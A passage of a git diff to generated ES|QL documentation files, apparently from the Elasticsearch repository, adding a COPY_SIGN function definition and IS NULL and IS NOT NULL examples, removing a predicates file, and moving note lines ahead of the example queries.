+COPY_SIGN(magnitude,sign) \ No newline at end of file diff --git a/docs/reference/query-languages/esql/images/operators/predicates.svg b/docs/reference/query-languages/esql/images/operators/predicates.svg deleted file mode 100644 index 2740ff8dc31e6..0000000000000 --- a/docs/reference/query-languages/esql/images/operators/predicates.svg +++ /dev/null @@ -1 +0,0 @@ -IS NULL and IS NOT NULLv \ No newline at end of file diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/copy_sign.json b/docs/reference/query-languages/esql/kibana/definition/functions/copy_sign.json new file mode 100644 index 0000000000000..51d3edca937f8 --- /dev/null +++ b/docs/reference/query-languages/esql/kibana/definition/functions/copy_sign.json @@ -0,0 +1,172 @@ +{ + "comment" : "This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.", + "type" : "scalar", + "name" : "copy_sign", + "description" : "Returns a value with the magnitude of the first argument and the sign of the second argument.\nThis function is similar to Java's Math.copySign(double magnitude, double sign) which is\nsimilar to `copysign` from IEEE 754.", + "signatures" : [ + { + "params" : [ + { + "name" : "magnitude", + "type" : "double", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "double", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "double" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "double", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "double" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "double", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "long", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "double" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "double", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "integer" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "integer" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "long", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "integer" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "long", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "double", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "long" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "long", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "long" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "long", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "long", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "long" + } + ], + "preview" : false, + "snapshot_only" : false +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/md5.json b/docs/reference/query-languages/esql/kibana/definition/functions/md5.json index b3d320ad838b4..b08d3681e6169 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/md5.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/md5.json @@ -2,7 +2,7 @@ "comment" : "This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.", "type" : "scalar", "name" : "md5", - "description" : "Computes the MD5 hash of the input.", + "description" : "Computes the MD5 hash of the input (if the MD5 hash is available on the JVM).", "signatures" : [ { "params" : [ diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohash.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohash.json index d2fc83008c150..43633b336453a 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohash.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohash.json @@ -52,4 +52,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex.json index 9a3a04cb0a7f8..f29db14ed50e7 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex.json @@ -55,4 +55,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_long.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_long.json index 52c7918a0c3ad..d582739620024 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_long.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_long.json @@ -34,4 +34,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_string.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_string.json index 612b13691d40c..a1abce7c75adb 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_string.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_string.json @@ -34,4 +34,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile.json index 06df5e3076fea..d728f186fc5ae 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile.json @@ -52,4 +52,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_long.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_long.json index 2eb49b5c320f9..b2c7c01aea606 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_long.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_long.json @@ -34,4 +34,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_string.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_string.json index df8e91514dc7b..5a327c2c50976 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_string.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_string.json @@ -34,4 +34,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/is_not_null.json b/docs/reference/query-languages/esql/kibana/definition/operators/is_not_null.json index 3722fbfaddeb8..f184165c249d4 100644 --- a/docs/reference/query-languages/esql/kibana/definition/operators/is_not_null.json +++ b/docs/reference/query-languages/esql/kibana/definition/operators/is_not_null.json @@ -223,6 +223,9 @@ "returnType" : "boolean" } ], + "examples" : [ + "FROM employees\n| WHERE is_rehired IS NOT NULL\n| STATS COUNT(emp_no)" + ], "preview" : false, "snapshot_only" : false } diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/is_null.json b/docs/reference/query-languages/esql/kibana/definition/operators/is_null.json index 0f6e70f8a0b91..dd8c9b4e3d4e7 100644 --- a/docs/reference/query-languages/esql/kibana/definition/operators/is_null.json +++ b/docs/reference/query-languages/esql/kibana/definition/operators/is_null.json @@ -223,6 +223,9 @@ "returnType" : "boolean" } ], + "examples" : [ + "FROM employees\n| WHERE birth_date IS NULL" + ], "preview" : false, "snapshot_only" : false } diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/like.json b/docs/reference/query-languages/esql/kibana/definition/operators/like.json index 49a455421a17e..97c88faa6e8fe 100644 --- a/docs/reference/query-languages/esql/kibana/definition/operators/like.json +++ b/docs/reference/query-languages/esql/kibana/definition/operators/like.json @@ -3,7 +3,7 @@ "type" : "operator", "operator" : "LIKE", "name" : "like", - "description" : "Use `LIKE` to filter data based on string patterns using wildcards. `LIKE`\nusually acts on a field placed on the left-hand side of the operator, but it can\nalso act on a constant (literal) expression. The right-hand side of the operator\nrepresents the pattern or a list of patterns. If a list of patterns is provided,\nthe expression will return true if any of the patterns match.\n\nThe following wildcard characters are supported:\n\n* `*` matches zero or more characters.\n* `?` matches one character.", + "description" : "Use `LIKE` to filter data based on string patterns using wildcards. `LIKE`\nusually acts on a field placed on the left-hand side of the operator, but it can\nalso act on a constant (literal) expression. The right-hand side of the operator\nrepresents the pattern.\n\nThe following wildcard characters are supported:\n\n* `*` matches zero or more characters.\n* `?` matches one character.", "signatures" : [ { "params" : [ diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/not like.json b/docs/reference/query-languages/esql/kibana/definition/operators/not like.json index e24559de82f59..8fbaf03df75df 100644 --- a/docs/reference/query-languages/esql/kibana/definition/operators/not like.json +++ b/docs/reference/query-languages/esql/kibana/definition/operators/not like.json @@ -3,7 +3,7 @@ "type" : "operator", "operator" : "not like", "name" : "not_like", - "description" : "Use `LIKE` to filter data based on string patterns using wildcards. `LIKE`\nusually acts on a field placed on the left-hand side of the operator, but it can\nalso act on a constant (literal) expression. The right-hand side of the operator\nrepresents the pattern or a list of patterns. If a list of patterns is provided,\nthe expression will return true if any of the patterns match.\n\nThe following wildcard characters are supported:\n\n* `*` matches zero or more characters.\n* `?` matches one character.", + "description" : "Use `LIKE` to filter data based on string patterns using wildcards. `LIKE`\nusually acts on a field placed on the left-hand side of the operator, but it can\nalso act on a constant (literal) expression. The right-hand side of the operator\nrepresents the pattern.\n\nThe following wildcard characters are supported:\n\n* `*` matches zero or more characters.\n* `?` matches one character.", "signatures" : [ { "params" : [ diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/predicates.json b/docs/reference/query-languages/esql/kibana/definition/operators/predicates.json deleted file mode 100644 index 516343c17af53..0000000000000 --- a/docs/reference/query-languages/esql/kibana/definition/operators/predicates.json +++ /dev/null @@ -1,194 +0,0 @@ -{ - "comment" : "This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.", - "type" : "scalar", - "name" : "predicates", - "description" : "For NULL comparison use the `IS NULL` and `IS NOT NULL` predicates.", - "signatures" : [ - { - "params" : [ - { - "name" : "field", - "type" : "boolean", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "cartesian_point", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "cartesian_shape", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "date", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "date_nanos", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "double", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "geo_point", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "geo_shape", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "integer", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "ip", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "keyword", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "long", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "text", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "unsigned_long", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "version", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - } - ], - "examples" : [ - "FROM employees\n| WHERE birth_date IS NULL", - "FROM employees\n| WHERE is_rehired IS NOT NULL\n| STATS COUNT(emp_no)" - ], - "preview" : false, - "snapshot_only" : false -} diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/bit_length.md b/docs/reference/query-languages/esql/kibana/docs/functions/bit_length.md index 19eb4e805aaf6..6bcd15e35af13 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/bit_length.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/bit_length.md @@ -3,10 +3,11 @@ ### BIT LENGTH Returns the bit length of a string. +Note: All strings are in UTF-8, so a single character can use multiple bytes. + ```esql FROM airports | WHERE country == "India" | KEEP city | EVAL fn_length = LENGTH(city), fn_bit_length = BIT_LENGTH(city) ``` -Note: All strings are in UTF-8, so a single character can use multiple bytes. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/byte_length.md b/docs/reference/query-languages/esql/kibana/docs/functions/byte_length.md index 6d9a7c9c10c41..a503e9cf54706 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/byte_length.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/byte_length.md @@ -3,10 +3,11 @@ ### BYTE LENGTH Returns the byte length of a string. +Note: All strings are in UTF-8, so a single character can use multiple bytes. + ```esql FROM airports | WHERE country == "India" | KEEP city | EVAL fn_length = LENGTH(city), fn_byte_length = BYTE_LENGTH(city) ``` -Note: All strings are in UTF-8, so a single character can use multiple bytes. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/ceil.md b/docs/reference/query-languages/esql/kibana/docs/functions/ceil.md index 31830a0b700ac..04d14197753f0 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/ceil.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/ceil.md @@ -3,8 +3,9 @@ ### CEIL Round a number up to the nearest integer. +Note: This is a noop for `long` (including unsigned) and `integer`. For `double` this picks the closest `double` value to the integer similar to [Math.ceil](https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Math.html#ceil(double)). + ```esql ROW a=1.8 | EVAL a=CEIL(a) ``` -Note: This is a noop for `long` (including unsigned) and `integer`. For `double` this picks the closest `double` value to the integer similar to [Math.ceil](https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Math.html#ceil(double)). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/copy_sign.md b/docs/reference/query-languages/esql/kibana/docs/functions/copy_sign.md new file mode 100644 index 0000000000000..e2bd39f147fbd --- /dev/null +++ b/docs/reference/query-languages/esql/kibana/docs/functions/copy_sign.md @@ -0,0 +1,6 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +### COPY SIGN +Returns a value with the magnitude of the first argument and the sign of the second argument. +This function is similar to Java's Math.copySign(double magnitude, double sign) which is +similar to `copysign` from [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/floor.md b/docs/reference/query-languages/esql/kibana/docs/functions/floor.md index 60cf9cc17ee4c..bdef3d2c31302 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/floor.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/floor.md @@ -3,10 +3,11 @@ ### FLOOR Round a number down to the nearest integer. +Note: This is a noop for `long` (including unsigned) and `integer`. +For `double` this picks the closest `double` value to the integer +similar to [Math.floor](https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Math.html#floor(double)). + ```esql ROW a=1.8 | EVAL a=FLOOR(a) ``` -Note: This is a noop for `long` (including unsigned) and `integer`. -For `double` this picks the closest `double` value to the integer -similar to [Math.floor](https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Math.html#floor(double)). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/greatest.md b/docs/reference/query-languages/esql/kibana/docs/functions/greatest.md index 752cc0ed77748..5ea02251ed3d1 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/greatest.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/greatest.md @@ -4,8 +4,9 @@ Returns the maximum value from multiple columns. This is similar to [`MV_MAX`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/mv-functions#esql-mv_max) except it is intended to run on multiple columns at once. +Note: When run on `keyword` or `text` fields, this returns the last string in alphabetical order. When run on `boolean` columns this will return `true` if any values are `true`. + ```esql ROW a = 10, b = 20 | EVAL g = GREATEST(a, b) ``` -Note: When run on `keyword` or `text` fields, this returns the last string in alphabetical order. When run on `boolean` columns this will return `true` if any values are `true`. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/length.md b/docs/reference/query-languages/esql/kibana/docs/functions/length.md index 71c4dd554f9f7..8e2713e37e073 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/length.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/length.md @@ -3,10 +3,11 @@ ### LENGTH Returns the character length of a string. +Note: All strings are in UTF-8, so a single character can use multiple bytes. + ```esql FROM airports | WHERE country == "India" | KEEP city | EVAL fn_length = LENGTH(city) ``` -Note: All strings are in UTF-8, so a single character can use multiple bytes. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/md5.md b/docs/reference/query-languages/esql/kibana/docs/functions/md5.md index 4229afca7398a..e96666870dc97 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/md5.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/md5.md @@ -1,7 +1,7 @@ % This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. ### MD5 -Computes the MD5 hash of the input. +Computes the MD5 hash of the input (if the MD5 hash is available on the JVM). ```esql FROM sample_data diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/median.md b/docs/reference/query-languages/esql/kibana/docs/functions/median.md index 6fc72bfb82421..0028f7afc4934 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/median.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/median.md @@ -3,8 +3,9 @@ ### MEDIAN The value that is greater than half of all values and less than half of all values, also known as the 50% [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile). +Note: Like [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile), `MEDIAN` is [usually approximate](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile-approximate). + ```esql FROM employees | STATS MEDIAN(salary), PERCENTILE(salary, 50) ``` -Note: Like [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile), `MEDIAN` is [usually approximate](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile-approximate). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/median_absolute_deviation.md b/docs/reference/query-languages/esql/kibana/docs/functions/median_absolute_deviation.md index 4be62924710f1..94a3c0cb9a3f8 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/median_absolute_deviation.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/median_absolute_deviation.md @@ -5,8 +5,9 @@ Returns the median absolute deviation, a measure of variability. It is a robust It is calculated as the median of each data point’s deviation from the median of the entire sample. That is, for a random variable `X`, the median absolute deviation is `median(|median(X) - X|)`. +Note: Like [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile), `MEDIAN_ABSOLUTE_DEVIATION` is [usually approximate](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile-approximate). + ```esql FROM employees | STATS MEDIAN(salary), MEDIAN_ABSOLUTE_DEVIATION(salary) ``` -Note: Like [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile), `MEDIAN_ABSOLUTE_DEVIATION` is [usually approximate](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile-approximate). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/mv_dedupe.md b/docs/reference/query-languages/esql/kibana/docs/functions/mv_dedupe.md index 8c37f24139174..7c330e2c8dd63 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/mv_dedupe.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/mv_dedupe.md @@ -3,8 +3,9 @@ ### MV DEDUPE Remove duplicate values from a multivalued field. +Note: `MV_DEDUPE` may, but won’t always, sort the values in the column. + ```esql ROW a=["foo", "foo", "bar", "foo"] | EVAL dedupe_a = MV_DEDUPE(a) ``` -Note: `MV_DEDUPE` may, but won’t always, sort the values in the column. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/mv_median_absolute_deviation.md b/docs/reference/query-languages/esql/kibana/docs/functions/mv_median_absolute_deviation.md index 94ed0def6195f..0d4863948c9bf 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/mv_median_absolute_deviation.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/mv_median_absolute_deviation.md @@ -5,8 +5,9 @@ Converts a multivalued field into a single valued field containing the median ab It is calculated as the median of each data point’s deviation from the median of the entire sample. That is, for a random variable `X`, the median absolute deviation is `median(|median(X) - X|)`. +Note: If the field has an even number of values, the medians will be calculated as the average of the middle two values. If the value is not a floating point number, the averages are rounded towards 0. + ```esql ROW values = [0, 2, 5, 6] | EVAL median_absolute_deviation = MV_MEDIAN_ABSOLUTE_DEVIATION(values), median = MV_MEDIAN(values) ``` -Note: If the field has an even number of values, the medians will be calculated as the average of the middle two values. If the value is not a floating point number, the averages are rounded towards 0. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/pow.md b/docs/reference/query-languages/esql/kibana/docs/functions/pow.md index 8c27e49d397f1..da08d767d7e9b 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/pow.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/pow.md @@ -3,8 +3,9 @@ ### POW Returns the value of `base` raised to the power of `exponent`. +Note: It is still possible to overflow a double result here; in that case, null will be returned. + ```esql ROW base = 2.0, exponent = 2 | EVAL result = POW(base, exponent) ``` -Note: It is still possible to overflow a double result here; in that case, null will be returned. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/to_date_nanos.md b/docs/reference/query-languages/esql/kibana/docs/functions/to_date_nanos.md index 6d2b18db20680..223ae10b45a4e 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/to_date_nanos.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/to_date_nanos.md @@ -3,10 +3,11 @@ ### TO DATE NANOS Converts an input to a nanosecond-resolution date value (aka date_nanos). +Note: The range for date nanos is 1970-01-01T00:00:00.000000000Z to 2262-04-11T23:47:16.854775807Z, attempting to convert values outside of that range will result in null with a warning. Additionally, integers cannot be converted into date nanos, as the range of integer nanoseconds only covers about 2 seconds after epoch. + ```esql FROM date_nanos | WHERE MV_MIN(nanos) < TO_DATE_NANOS("2023-10-23T12:27:28.948Z") AND millis > "2000-01-01" | SORT nanos DESC ``` -Note: The range for date nanos is 1970-01-01T00:00:00.000000000Z to 2262-04-11T23:47:16.854775807Z, attempting to convert values outside of that range will result in null with a warning. Additionally, integers cannot be converted into date nanos, as the range of integer nanoseconds only covers about 2 seconds after epoch. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/to_datetime.md b/docs/reference/query-languages/esql/kibana/docs/functions/to_datetime.md index b5361583ff465..de94e09965ce2 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/to_datetime.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/to_datetime.md @@ -5,8 +5,9 @@ Converts an input value to a date value. A string will only be successfully converted if it’s respecting the format `yyyy-MM-dd'T'HH:mm:ss.SSS'Z'`. To convert dates in other formats, use [`DATE_PARSE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/date-time-functions#esql-date_parse). +Note: Note that when converting from nanosecond resolution to millisecond resolution with this function, the nanosecond date is truncated, not rounded. + ```esql ROW string = ["1953-09-02T00:00:00.000Z", "1964-06-02T00:00:00.000Z", "1964-06-02 00:00:00"] | EVAL datetime = TO_DATETIME(string) ``` -Note: Note that when converting from nanosecond resolution to millisecond resolution with this function, the nanosecond date is truncated, not rounded. diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/add.md b/docs/reference/query-languages/esql/kibana/docs/operators/add.md index b07deb2c38360..0d91dcd400252 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/add.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/add.md @@ -2,4 +2,3 @@ ### ADD `+` Add two numbers together. If either field is [multivalued](https://www.elastic.co/docs/reference/query-languages/esql/esql-multivalued-fields) then the result is `null`. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/is_not_null.md b/docs/reference/query-languages/esql/kibana/docs/operators/is_not_null.md index 25157e2bb7af2..d91564c45778d 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/is_not_null.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/is_not_null.md @@ -4,3 +4,9 @@ Returns `false` if the value is `NULL`, `true` otherwise. Note: If a field is only in some documents it will be `NULL` in the documents that did not contain it. + +```esql +FROM employees +| WHERE is_rehired IS NOT NULL +| STATS COUNT(emp_no) +``` diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/is_null.md b/docs/reference/query-languages/esql/kibana/docs/operators/is_null.md index 625b819935332..3d9d05d037516 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/is_null.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/is_null.md @@ -4,3 +4,8 @@ Returns `true` if the value is `NULL`, `false` otherwise. Note: If a field is only in some documents it will be `NULL` in the documents that did not contain it. + +```esql +FROM employees +| WHERE birth_date IS NULL +``` diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/like.md b/docs/reference/query-languages/esql/kibana/docs/operators/like.md index ff351eb71bd9a..52bfeb6f3ff95 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/like.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/like.md @@ -4,8 +4,7 @@ Use `LIKE` to filter data based on string patterns using wildcards. `LIKE` usually acts on a field placed on the left-hand side of the operator, but it can also act on a constant (literal) expression. The right-hand side of the operator -represents the pattern or a list of patterns. If a list of patterns is provided, -the expression will return true if any of the patterns match. +represents the pattern. The following wildcard characters are supported: diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/mod.md b/docs/reference/query-languages/esql/kibana/docs/operators/mod.md index 71cad28b1dc23..9a61ddf4b745d 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/mod.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/mod.md @@ -2,4 +2,3 @@ ### MODULO `%` Divide one number by another and return the remainder. If either field is [multivalued](https://www.elastic.co/docs/reference/query-languages/esql/esql-multivalued-fields) then the result is `null`. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/mul.md b/docs/reference/query-languages/esql/kibana/docs/operators/mul.md index eaa4cba9d7e7d..97921119d449d 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/mul.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/mul.md @@ -2,4 +2,3 @@ ### MULTIPLY `*` Multiply two numbers together. If either field is [multivalued](https://www.elastic.co/docs/reference/query-languages/esql/esql-multivalued-fields) then the result is `null`. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/neg.md b/docs/reference/query-languages/esql/kibana/docs/operators/neg.md index 036c545d247f4..e25b1ede4c47a 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/neg.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/neg.md @@ -2,4 +2,3 @@ ### NEGATE 